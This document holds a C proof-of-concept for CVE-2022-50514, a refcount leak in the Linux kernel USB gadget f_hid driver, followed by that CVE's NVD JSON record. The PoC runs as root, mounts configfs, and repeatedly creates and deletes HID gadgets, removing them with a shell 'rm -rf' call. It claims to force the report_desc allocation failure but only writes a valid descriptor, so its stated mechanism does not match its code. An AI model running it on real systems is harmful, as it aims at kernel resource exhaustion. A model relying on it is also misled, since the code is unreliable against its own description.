CVE-2022-50514

/* CVE-2022-50514 PoC - Trigger refcount leak in f_hid driver * This PoC demonstrates how to trigger the reference count leak * in the Linux kernel USB Gadget f_hid driver by forcing * report_desc allocation failure. * * Note: This requires root privileges and USB Gadget support. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/mount.h> #include <sys/stat.h> #include <sys/types.h> #include <errno.h> #include <limits.h> #define GADGET_PATH "/sys/kernel/config/usb_gadget/test_gadget" #define HID_DESC_LEN 18 /* Minimal HID report descriptor */ static unsigned char hid_report_desc[] = { 0x06, 0x00, 0xFF, // Usage Page (Vendor Defined) 0x09, 0x01, // Usage (Vendor Usage 1) 0xA1, 0x01, // Collection (Application) 0x09, 0x02, // Usage (Vendor Usage 2) 0x15, 0x00, // Logical Minimum (0) 0x26, 0xFF, 0x00, // Logical Maximum (255) 0x75, 0x08, // Report Size (8) 0x95, 0x40, // Report Count (64) 0x81, 0x02, // Input (Data,Var,Abs) 0xC0 // End Collection }; int create_gadget_hid(const char *gadget_name, unsigned char *report_desc, int desc_len) { char path[PATH_MAX]; int fd; /* Step 1: Create the gadget */ snprintf(path, sizeof(path), "%s/%s", GADGET_PATH, gadget_name); mkdir(path, 0755); /* Step 2: Create strings and configs */ snprintf(path, sizeof(path), "%s/%s/strings/0x409", GADGET_PATH, gadget_name); mkdir(path, 0755); snprintf(path, sizeof(path), "%s/%s/configs/c.1", GADGET_PATH, gadget_name); mkdir(path, 0755); snprintf(path, sizeof(path), "%s/%s/configs/c.1/strings/0x409", GADGET_PATH, gadget_name); mkdir(path, 0755); /* Step 3: Create HID function */ snprintf(path, sizeof(path), "%s/%s/functions/hid.usb0", GADGET_PATH, gadget_name); mkdir(path, 0755); /* Step 4: Write report descriptor - this triggers the vulnerable path */ snprintf(path, sizeof(path), "%s/%s/functions/hid.usb0/report_desc", GADGET_PATH, gadget_name); fd = open(path, O_WRONLY); if (fd < 0) { perror("open report_desc"); return -1; } /* Write the report descriptor to trigger allocation in kernel */ if (write(fd, report_desc, desc_len) != desc_len) { perror("write report_desc"); close(fd); return -1; } close(fd); return 0; } void cleanup_gadget(const char *gadget_name) { char path[PATH_MAX]; char cmd[PATH_MAX * 2]; /* Unlink function from config */ snprintf(path, sizeof(path), "%s/%s/configs/c.1/hid.usb0", GADGET_PATH, gadget_name); unlink(path); /* Remove function */ snprintf(path, sizeof(path), "%s/%s/functions/hid.usb0", GADGET_PATH, gadget_name); rmdir(path); /* Remove gadget */ snprintf(path, sizeof(path), "%s/%s", GADGET_PATH, gadget_name); snprintf(cmd, sizeof(cmd), "rm -rf %s", path); system(cmd); } int main(int argc, char *argv[]) { int i; int iterations = 100; if (getuid() != 0) { fprintf(stderr, "This PoC requires root privileges\n"); return 1; } /* Mount configfs if not already mounted */ if (mount("configfs", "/sys/kernel/config", "configfs", 0, NULL) != 0 && errno != EBUSY) { perror("mount configfs"); /* Continue anyway, configfs might already be mounted */ } printf("CVE-2022-50514 PoC: Triggering refcount leak in f_hid driver\n"); printf("Iterations: %d\n", iterations); /* * Repeatedly create and destroy HID gadget functions. * On vulnerable kernels, each failure to properly decrement * opts->refcnt will leak a reference, eventually causing * resource exhaustion. */ for (i = 0; i < iterations; i++) { char gadget_name[64]; snprintf(gadget_name, sizeof(gadget_name), "gadget_%d", i); printf("[%d/%d] Creating gadget: %s\n", i + 1, iterations, gadget_name); if (create_gadget_hid(gadget_name, hid_report_desc, sizeof(hid_report_desc)) < 0) { fprintf(stderr, "Failed to create gadget %s\n", gadget_name); } cleanup_gadget(gadget_name); } printf("PoC completed. Check kernel logs for refcount warnings.\n"); printf("On vulnerable kernels, check /sys/kernel/debug/refcount-statistics\n"); return 0; }

{"cve": {"id": "CVE-2022-50514", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:34.983", "lastModified": "2026-03-17T14:11:49.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: gadget: f_hid: fix refcount leak on error path\n\nWhen failing to allocate report_desc, opts->refcnt has already been\nincremented so it needs to be decremented to avoid leaving the options\nstructure permanently locked."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.19", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AC36D7FF-60C4-4F9B-8BFB-5C7A377A0ABD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/216437dd64fce36791a3b6cc8f8013df36856958", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/70a3288a7586526315105c699b687d78cd32559a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/80dc47e751a837106c09bec73964ff8f7ea280b4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/95412c932b3c9e8cc4431dac4fac8fcd80d54982", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9d4a0aca8a75550d3456c8de339a341dc4536ec5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ba78f7c10606719f702c04a15fb0471507b32d7b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e88b89a096af0001bcff6bf7ad2feb1486487173", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}